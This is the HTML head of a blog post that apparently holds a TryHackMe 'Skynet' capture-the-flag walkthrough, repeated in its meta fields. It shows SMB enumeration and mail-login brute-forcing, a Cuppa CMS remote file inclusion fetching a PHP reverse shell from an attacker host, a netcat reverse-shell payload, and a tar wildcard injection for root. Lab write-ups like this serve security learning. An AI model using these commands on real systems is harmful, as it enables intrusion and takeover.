<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.7.1 -->
<title>Tryhackme Walkthough - Skynet | DSPO6</title>
<meta name="generator" content="Jekyll v3.9.0" />
<meta property="og:title" content="Tryhackme Walkthough - Skynet" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="There isn’t much information about this room on the Tryhackme page apart from that it is a Terminator themed machine so we will jump right in. Initial Enumeration The nmap scan show the following ports open 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 110/tcp open pop3 Dovecot pop3d 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: ... The webste on port 80 shows this page but looking at the source there isn’t much else to enumerate. I ran a gobuster scan and that found the following folders. /.hta (Status: 403) /.htpasswd (Status: 403) /.htaccess (Status: 403) /admin (Status: 301) /config (Status: 301) /css (Status: 301) /index.html (Status: 200) /js (Status: 301) /server-status (Status: 403) /squirrelmail (Status: 301) ============================== The most interesting one here is the /squirrelmail and navigating to it shows a log in screen. I checked the Exploit DB to see if there was something available for version 1.423 but nothing stood out as being worth trying at this stage. Enumerating SMB I ran enum4linx and the output showed 4 shares one of which was anonymous //10.10.237.154/print$ Mapping: DENIED, Listing: N/A //10.10.237.154/anonymous Mapping: OK, Listing: OK //10.10.237.154/milesdyson Mapping: DENIED, Listing: N/A //10.10.237.154/IPC$ [E] Can&#39;t understand response: Using smbclient without a password, I discovered a file called attention.txt (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ smbclient -U Anonymous //$IP/anonymous Enter WORKGROUP\Anonymous&#39;s password: Try &quot;help&quot; to get a list of possible commands. smb: \&gt; smb: \&gt; ls . D 0 Thu Nov 26 11:04:00 2020 .. D 0 Tue Sep 17 03:20:17 2019 attention.txt N 163 Tue Sep 17 23:04:59 2019 logs D 0 Wed Sep 18 00:42:16 2019 9204224 blocks of size 1024. 5829532 blocks available smb: \&gt; mget attention.txt Get file attention.txt? yes getting file \attention.txt of size 163 as attention.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) smb: \&gt; This file contained the following text:- (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ cat attention.txt A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ I also navigated to the logs directory which contained 3 log files smb: \logs\&gt; ls . D 0 Wed Sep 18 00:42:16 2019 .. D 0 Thu Nov 26 11:04:00 2020 log2.txt N 0 Wed Sep 18 00:42:13 2019 log1.txt N 471 Wed Sep 18 00:41:59 2019 log3.txt N 0 Wed Sep 18 00:42:16 2019 ... Two were zero bytes but the log1.txt contains a list of what could be passwords. (dspo6㉿kali)[~/pentest/boxes/thm/Skynet/smb]$ cat log1.txt cyborg007haloterminator terminator22596 terminator219 terminator20 terminator1989 terminator1988 terminator168 terminator16 terminator143 terminator13 terminator123!@# terminator1056 terminator101 terminator10 terminator02 terminator00 roboterminator pongterminator manasturcaluterminator exterminator95 exterminator200 dterminator djxterminator dexterminator determinator cyborg007haloterminator avsterminator alonsoterminator Walterminator 79terminator6 1996terminator Logging in to Email and then SMB Going back to the squirrel mail login page, I launched Burpsuite intruder with the list of potential passwords and the name milesdyson that I saw in SMB enumeration. Looks like cyborg007haloterminator is the password and we are in. And the first email mentions a password Which I then try with the open share for milesdyson found earlier. (dspo6㉿kali)[](~/pentest/boxes/thm/Skynet]$ smbclient -U milesdyson //10.10.174.240/milesdyson Enter WORKGROUP\milesdyson&#39;s password: Try &quot;help&quot; to get a list of possible commands. smb: \&gt; ls . D 0 Tue Sep 17 05:05:47 2019 .. D 0 Tue Sep 17 23:51:03 2019 Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019 Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019 Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019 notes D 0 Tue Sep 17 05:18:40 2019 Navigating to the notes directory, I see that there is a file called important.txt with the following text. (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ cat important.txt 1. Add features to beta CMS /45kra24zxs28v3yd 2. Work on T-800 Model 101 blueprints 3. Spend more time with my wife (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ CMS Enumeration Navigating to to the folder mentioned in the important.txt file we find this page. ![/assets/img/20210228081847.png) I decide to run gobuster again on this page and the output shows that there is an administrator page (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ gobuster dir -u 10.10.174.240/45kra24zxs28v3yd -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.174.240/45kra24zxs28v3yd [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/02/23 20:01:43 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.hta (Status: 403) /.htaccess (Status: 403) /administrator (Status: 301) /index.html (Status: 200) =============================================================== 2021/02/23 20:03:00 Finished =============================================================== (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ The CMS running is Cuppa CMS CMS Exploitation Searchspolit leads to this exploit https://www.exploit-db.com/exploits/25971 (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ searchsploit cuppa ------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------- --------------------------------- Cuppa CMS - &#39;/alertConfigField.php&#39; Local/Remote File Inclusion | php/webapps/25971.txt ------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ I try the exploit to see if it works and it does http://10.10.125.81/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd I now try to upload a PHP reverse shell from a webserver on my machine. (dspo6㉿kali)\[~/pentest/boxes/thm/Skynet\]$ curl http://10.10.125.81/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.2.2.175/php-reverse-shell.php It works - we are in! Getting the User Flag (dspo6㉿kali)[~]$ nc -lvnp 9003 listening on [any] 9003 ... connect to [10.2.2.175] from (UNKNOWN) [10.10.125.81] 46742 Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 19:38:51 up 39 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can&#39;t access tty; job control turned off $ whoami www-data $ I stabilize the shell $ python3 -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39; www-data@skynet:/usr$ export TERM=xterm export TERM=xterm www-data@skynet:/usr$ stty raw -echo; fg stty raw -echo; fg bash: fg: current: no such job www-data@skynet:/usr$ And get the flag www-data@skynet:/$ ls bin home lib64 opt sbin tmp vmlinuz.old boot initrd.img lost+found proc snap usr dev initrd.img.old media root srv var etc lib mnt run sys vmlinuz www-data@skynet:/$ cd home www-data@skynet:/home$ ls milesdyson www-data@skynet:/home$ cd milesdyson www-data@skynet:/home/milesdyson$ ls backups mail share user.txt www-data@skynet:/home/milesdyson$ cat user.txt xxxe5c2109a40f95809xxxxxxx www-data@skynet:/home/milesdyson$ Escalation We are currently running under the www-data account. Using the password we found earlier I can change to the milesdyson account but that doesn’t help us right now. www-data@skynet:/home/milesdyson$ su milesdyson Password: cyborg007haloterminator milesdyson@skynet: I checked to see if there were any cron jobs running and found one called backup.sh that ran every minute www-data@skynet:/home/milesdyson$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don&#39;t have to run the `crontab&#39; # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command */1 * * * * root /home/milesdyson/backups/backup.sh 17 * * * * root cd / &amp;&amp; run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.monthly ) # www-data@skynet:/home/milesdyson$ Unfortunately, this is running under root. Looking at the script I see this. www-data@skynet:/home/milesdyson/backups$ cat backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * www-data@skynet:/home/milesdyson/backups$ Brick Wall After trying many things, I hit a brick wall and was stuck so I had to resort to trying to find a hint on the web. It was this research that led me to this walktough on YouTube by John Hammond which highlighted a technique, tar wildcard injection which can be read about on this site. Escalation (Resumed) I created reverse netcat shellcode using msfvenom (dspo6㉿kali)[~/pentest/pentest_utils/shells]$ msfvenom -p cmd/unix/reverse_netcat lhost=10.2.2.175 lport=8888 R [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload [-] No arch selected, selecting arch: cmd from the payload No encoder specified, outputting raw payload Payload size: 88 bytes mkfifo /tmp/pbwq; nc 10.2.2.175 8888 0&lt;/tmp/pbwq | /bin/sh &gt;/tmp/pbwq 2&gt;&amp;1; rm /tmp/pbwq (dspo6㉿kali)[~/pentest/pentest_utils/shells]$ I then created a script on the target using this shellcode and copied it to the folder being backup by the cron job. www-data@skynet:/dev/shm$ echo &quot;mkfifo /tmp/pbwq; nc 10.2.2.175 8888 0&lt;/tmp/pbwq | /bin/sh &gt;/tmp/pbwq 2&gt;&amp;1; rm /tmp/pbwq &gt; &quot; &gt; shell.sh www-data@skynet:/dev/shm$ www-data@skynet:/dev/shm$ cp shell.sh /var/www/html I then ran through the steps indicated on the tar wildcard page and waited for the backup cron job to run. www-data@skynet:/dev/shm$ cp --checkpoint=1 /var/www/html cp: unrecognized option &#39;--checkpoint=1&#39; Try &#39;cp --help&#39; for more information. www-data@skynet:/dev/shm$ cd /var/www/html www-data@skynet:/var/www/html$ echo &quot;&quot; &gt; &quot;--checkpoint-action=exec=sh shell.sh&quot; Shell acheived. (dspo6㉿kali)[~]$ nc -nvlp 8888 listening on [any] 8888 ... connect to [10.2.2.175] from (UNKNOWN) [10.10.184.206] 55396 ls 45kra24zxs28v3yd admin ai --checkpoint-action=exec=sh shell.sh config css image.png index.html js shell.sh style.css cd .. ls html cd .. cd /root ls root.txt cat root.txt XXX4753accc7179a282XXX Note: the tar wildcard exploit says that there is one more command but I got a shell before I executed it. echo &quot;&quot; &gt; --checkpoint=1 Conclusion The first half of owning this box was fun but it was frustrating to have to resort to checking other walkthroughs to make progress at the escalation part. Since I am still learning these techniques, maybe it is not all that bad. I found out about something new and maybe I will be able to use this knowledge in the future." />
<meta property="og:description" content="There isn’t much information about this room on the Tryhackme page apart from that it is a Terminator themed machine so we will jump right in. Initial Enumeration The nmap scan show the following ports open 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 110/tcp open pop3 Dovecot pop3d 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: ... The webste on port 80 shows this page but looking at the source there isn’t much else to enumerate. I ran a gobuster scan and that found the following folders. /.hta (Status: 403) /.htpasswd (Status: 403) /.htaccess (Status: 403) /admin (Status: 301) /config (Status: 301) /css (Status: 301) /index.html (Status: 200) /js (Status: 301) /server-status (Status: 403) /squirrelmail (Status: 301) ============================== The most interesting one here is the /squirrelmail and navigating to it shows a log in screen. I checked the Exploit DB to see if there was something available for version 1.423 but nothing stood out as being worth trying at this stage. Enumerating SMB I ran enum4linx and the output showed 4 shares one of which was anonymous //10.10.237.154/print$ Mapping: DENIED, Listing: N/A //10.10.237.154/anonymous Mapping: OK, Listing: OK //10.10.237.154/milesdyson Mapping: DENIED, Listing: N/A //10.10.237.154/IPC$ [E] Can&#39;t understand response: Using smbclient without a password, I discovered a file called attention.txt (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ smbclient -U Anonymous //$IP/anonymous Enter WORKGROUP\Anonymous&#39;s password: Try &quot;help&quot; to get a list of possible commands. smb: \&gt; smb: \&gt; ls . D 0 Thu Nov 26 11:04:00 2020 .. D 0 Tue Sep 17 03:20:17 2019 attention.txt N 163 Tue Sep 17 23:04:59 2019 logs D 0 Wed Sep 18 00:42:16 2019 9204224 blocks of size 1024. 5829532 blocks available smb: \&gt; mget attention.txt Get file attention.txt? yes getting file \attention.txt of size 163 as attention.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) smb: \&gt; This file contained the following text:- (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ cat attention.txt A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ I also navigated to the logs directory which contained 3 log files smb: \logs\&gt; ls . D 0 Wed Sep 18 00:42:16 2019 .. D 0 Thu Nov 26 11:04:00 2020 log2.txt N 0 Wed Sep 18 00:42:13 2019 log1.txt N 471 Wed Sep 18 00:41:59 2019 log3.txt N 0 Wed Sep 18 00:42:16 2019 ... Two were zero bytes but the log1.txt contains a list of what could be passwords. (dspo6㉿kali)[~/pentest/boxes/thm/Skynet/smb]$ cat log1.txt cyborg007haloterminator terminator22596 terminator219 terminator20 terminator1989 terminator1988 terminator168 terminator16 terminator143 terminator13 terminator123!@# terminator1056 terminator101 terminator10 terminator02 terminator00 roboterminator pongterminator manasturcaluterminator exterminator95 exterminator200 dterminator djxterminator dexterminator determinator cyborg007haloterminator avsterminator alonsoterminator Walterminator 79terminator6 1996terminator Logging in to Email and then SMB Going back to the squirrel mail login page, I launched Burpsuite intruder with the list of potential passwords and the name milesdyson that I saw in SMB enumeration. Looks like cyborg007haloterminator is the password and we are in. And the first email mentions a password Which I then try with the open share for milesdyson found earlier. (dspo6㉿kali)[](~/pentest/boxes/thm/Skynet]$ smbclient -U milesdyson //10.10.174.240/milesdyson Enter WORKGROUP\milesdyson&#39;s password: Try &quot;help&quot; to get a list of possible commands. smb: \&gt; ls . D 0 Tue Sep 17 05:05:47 2019 .. D 0 Tue Sep 17 23:51:03 2019 Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019 Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019 Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019 notes D 0 Tue Sep 17 05:18:40 2019 Navigating to the notes directory, I see that there is a file called important.txt with the following text. (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ cat important.txt 1. Add features to beta CMS /45kra24zxs28v3yd 2. Work on T-800 Model 101 blueprints 3. Spend more time with my wife (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ CMS Enumeration Navigating to to the folder mentioned in the important.txt file we find this page. ![/assets/img/20210228081847.png) I decide to run gobuster again on this page and the output shows that there is an administrator page (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ gobuster dir -u 10.10.174.240/45kra24zxs28v3yd -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.174.240/45kra24zxs28v3yd [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/02/23 20:01:43 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.hta (Status: 403) /.htaccess (Status: 403) /administrator (Status: 301) /index.html (Status: 200) =============================================================== 2021/02/23 20:03:00 Finished =============================================================== (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ The CMS running is Cuppa CMS CMS Exploitation Searchspolit leads to this exploit https://www.exploit-db.com/exploits/25971 (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ searchsploit cuppa ------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------- --------------------------------- Cuppa CMS - &#39;/alertConfigField.php&#39; Local/Remote File Inclusion | php/webapps/25971.txt ------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ I try the exploit to see if it works and it does http://10.10.125.81/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd I now try to upload a PHP reverse shell from a webserver on my machine. (dspo6㉿kali)\[~/pentest/boxes/thm/Skynet\]$ curl http://10.10.125.81/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.2.2.175/php-reverse-shell.php It works - we are in! Getting the User Flag (dspo6㉿kali)[~]$ nc -lvnp 9003 listening on [any] 9003 ... connect to [10.2.2.175] from (UNKNOWN) [10.10.125.81] 46742 Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 19:38:51 up 39 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can&#39;t access tty; job control turned off $ whoami www-data $ I stabilize the shell $ python3 -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39; www-data@skynet:/usr$ export TERM=xterm export TERM=xterm www-data@skynet:/usr$ stty raw -echo; fg stty raw -echo; fg bash: fg: current: no such job www-data@skynet:/usr$ And get the flag www-data@skynet:/$ ls bin home lib64 opt sbin tmp vmlinuz.old boot initrd.img lost+found proc snap usr dev initrd.img.old media root srv var etc lib mnt run sys vmlinuz www-data@skynet:/$ cd home www-data@skynet:/home$ ls milesdyson www-data@skynet:/home$ cd milesdyson www-data@skynet:/home/milesdyson$ ls backups mail share user.txt www-data@skynet:/home/milesdyson$ cat user.txt xxxe5c2109a40f95809xxxxxxx www-data@skynet:/home/milesdyson$ Escalation We are currently running under the www-data account. Using the password we found earlier I can change to the milesdyson account but that doesn’t help us right now. www-data@skynet:/home/milesdyson$ su milesdyson Password: cyborg007haloterminator milesdyson@skynet: I checked to see if there were any cron jobs running and found one called backup.sh that ran every minute www-data@skynet:/home/milesdyson$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don&#39;t have to run the `crontab&#39; # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command */1 * * * * root /home/milesdyson/backups/backup.sh 17 * * * * root cd / &amp;&amp; run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.monthly ) # www-data@skynet:/home/milesdyson$ Unfortunately, this is running under root. Looking at the script I see this. www-data@skynet:/home/milesdyson/backups$ cat backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * www-data@skynet:/home/milesdyson/backups$ Brick Wall After trying many things, I hit a brick wall and was stuck so I had to resort to trying to find a hint on the web. It was this research that led me to this walktough on YouTube by John Hammond which highlighted a technique, tar wildcard injection which can be read about on this site. Escalation (Resumed) I created reverse netcat shellcode using msfvenom (dspo6㉿kali)[~/pentest/pentest_utils/shells]$ msfvenom -p cmd/unix/reverse_netcat lhost=10.2.2.175 lport=8888 R [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload [-] No arch selected, selecting arch: cmd from the payload No encoder specified, outputting raw payload Payload size: 88 bytes mkfifo /tmp/pbwq; nc 10.2.2.175 8888 0&lt;/tmp/pbwq | /bin/sh &gt;/tmp/pbwq 2&gt;&amp;1; rm /tmp/pbwq (dspo6㉿kali)[~/pentest/pentest_utils/shells]$ I then created a script on the target using this shellcode and copied it to the folder being backup by the cron job. www-data@skynet:/dev/shm$ echo &quot;mkfifo /tmp/pbwq; nc 10.2.2.175 8888 0&lt;/tmp/pbwq | /bin/sh &gt;/tmp/pbwq 2&gt;&amp;1; rm /tmp/pbwq &gt; &quot; &gt; shell.sh www-data@skynet:/dev/shm$ www-data@skynet:/dev/shm$ cp shell.sh /var/www/html I then ran through the steps indicated on the tar wildcard page and waited for the backup cron job to run. www-data@skynet:/dev/shm$ cp --checkpoint=1 /var/www/html cp: unrecognized option &#39;--checkpoint=1&#39; Try &#39;cp --help&#39; for more information. www-data@skynet:/dev/shm$ cd /var/www/html www-data@skynet:/var/www/html$ echo &quot;&quot; &gt; &quot;--checkpoint-action=exec=sh shell.sh&quot; Shell acheived. (dspo6㉿kali)[~]$ nc -nvlp 8888 listening on [any] 8888 ... connect to [10.2.2.175] from (UNKNOWN) [10.10.184.206] 55396 ls 45kra24zxs28v3yd admin ai --checkpoint-action=exec=sh shell.sh config css image.png index.html js shell.sh style.css cd .. ls html cd .. cd /root ls root.txt cat root.txt XXX4753accc7179a282XXX Note: the tar wildcard exploit says that there is one more command but I got a shell before I executed it. echo &quot;&quot; &gt; --checkpoint=1 Conclusion The first half of owning this box was fun but it was frustrating to have to resort to checking other walkthroughs to make progress at the escalation part. Since I am still learning these techniques, maybe it is not all that bad. I found out about something new and maybe I will be able to use this knowledge in the future." />
<link rel="canonical" href="http://localhost:4000/tryhackme/2021/02/28/tryhackme-skynet.html" />
<meta property="og:url" content="http://localhost:4000/tryhackme/2021/02/28/tryhackme-skynet.html" />
<meta property="og:site_name" content="DSPO6" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-02-28T08:18:19-08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Tryhackme Walkthough - Skynet" />
<script type="application/ld+json">
{"@type":"BlogPosting","url":"http://localhost:4000/tryhackme/2021/02/28/tryhackme-skynet.html","headline":"Tryhackme Walkthough - Skynet","dateModified":"2021-02-28T08:18:19-08:00","datePublished":"2021-02-28T08:18:19-08:00","description":"There isn’t much information about this room on the Tryhackme page apart from that it is a Terminator themed machine so we will jump right in. Initial Enumeration The nmap scan show the following ports open 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 110/tcp open pop3 Dovecot pop3d 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: ... The webste on port 80 shows this page but looking at the source there isn’t much else to enumerate. I ran a gobuster scan and that found the following folders. /.hta (Status: 403) /.htpasswd (Status: 403) /.htaccess (Status: 403) /admin (Status: 301) /config (Status: 301) /css (Status: 301) /index.html (Status: 200) /js (Status: 301) /server-status (Status: 403) /squirrelmail (Status: 301) ============================== The most interesting one here is the /squirrelmail and navigating to it shows a log in screen. I checked the Exploit DB to see if there was something available for version 1.423 but nothing stood out as being worth trying at this stage. Enumerating SMB I ran enum4linx and the output showed 4 shares one of which was anonymous //10.10.237.154/print$ Mapping: DENIED, Listing: N/A //10.10.237.154/anonymous Mapping: OK, Listing: OK //10.10.237.154/milesdyson Mapping: DENIED, Listing: N/A //10.10.237.154/IPC$ [E] Can&#39;t understand response: Using smbclient without a password, I discovered a file called attention.txt (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ smbclient -U Anonymous //$IP/anonymous Enter WORKGROUP\\Anonymous&#39;s password: Try &quot;help&quot; to get a list of possible commands. smb: \\&gt; smb: \\&gt; ls . D 0 Thu Nov 26 11:04:00 2020 .. D 0 Tue Sep 17 03:20:17 2019 attention.txt N 163 Tue Sep 17 23:04:59 2019 logs D 0 Wed Sep 18 00:42:16 2019 9204224 blocks of size 1024. 5829532 blocks available smb: \\&gt; mget attention.txt Get file attention.txt? yes getting file \\attention.txt of size 163 as attention.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) smb: \\&gt; This file contained the following text:- (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ cat attention.txt A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ I also navigated to the logs directory which contained 3 log files smb: \\logs\\&gt; ls . D 0 Wed Sep 18 00:42:16 2019 .. D 0 Thu Nov 26 11:04:00 2020 log2.txt N 0 Wed Sep 18 00:42:13 2019 log1.txt N 471 Wed Sep 18 00:41:59 2019 log3.txt N 0 Wed Sep 18 00:42:16 2019 ... Two were zero bytes but the log1.txt contains a list of what could be passwords. (dspo6㉿kali)[~/pentest/boxes/thm/Skynet/smb]$ cat log1.txt cyborg007haloterminator terminator22596 terminator219 terminator20 terminator1989 terminator1988 terminator168 terminator16 terminator143 terminator13 terminator123!@# terminator1056 terminator101 terminator10 terminator02 terminator00 roboterminator pongterminator manasturcaluterminator exterminator95 exterminator200 dterminator djxterminator dexterminator determinator cyborg007haloterminator avsterminator alonsoterminator Walterminator 79terminator6 1996terminator Logging in to Email and then SMB Going back to the squirrel mail login page, I launched Burpsuite intruder with the list of potential passwords and the name milesdyson that I saw in SMB enumeration. Looks like cyborg007haloterminator is the password and we are in. And the first email mentions a password Which I then try with the open share for milesdyson found earlier. (dspo6㉿kali)[](~/pentest/boxes/thm/Skynet]$ smbclient -U milesdyson //10.10.174.240/milesdyson Enter WORKGROUP\\milesdyson&#39;s password: Try &quot;help&quot; to get a list of possible commands. smb: \\&gt; ls . D 0 Tue Sep 17 05:05:47 2019 .. D 0 Tue Sep 17 23:51:03 2019 Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019 Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019 Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019 notes D 0 Tue Sep 17 05:18:40 2019 Navigating to the notes directory, I see that there is a file called important.txt with the following text. (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ cat important.txt 1. Add features to beta CMS /45kra24zxs28v3yd 2. Work on T-800 Model 101 blueprints 3. Spend more time with my wife (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ CMS Enumeration Navigating to to the folder mentioned in the important.txt file we find this page. ![/assets/img/20210228081847.png) I decide to run gobuster again on this page and the output shows that there is an administrator page (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ gobuster dir -u 10.10.174.240/45kra24zxs28v3yd -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.174.240/45kra24zxs28v3yd [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/02/23 20:01:43 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.hta (Status: 403) /.htaccess (Status: 403) /administrator (Status: 301) /index.html (Status: 200) =============================================================== 2021/02/23 20:03:00 Finished =============================================================== (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ The CMS running is Cuppa CMS CMS Exploitation Searchspolit leads to this exploit https://www.exploit-db.com/exploits/25971 (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ searchsploit cuppa ------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------- --------------------------------- Cuppa CMS - &#39;/alertConfigField.php&#39; Local/Remote File Inclusion | php/webapps/25971.txt ------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results (dspo6㉿kali)[~/pentest/boxes/thm/Skynet]$ I try the exploit to see if it works and it does http://10.10.125.81/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd I now try to upload a PHP reverse shell from a webserver on my machine. (dspo6㉿kali)\\[~/pentest/boxes/thm/Skynet\\]$ curl http://10.10.125.81/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.2.2.175/php-reverse-shell.php It works - we are in! Getting the User Flag (dspo6㉿kali)[~]$ nc -lvnp 9003 listening on [any] 9003 ... connect to [10.2.2.175] from (UNKNOWN) [10.10.125.81] 46742 Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 19:38:51 up 39 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can&#39;t 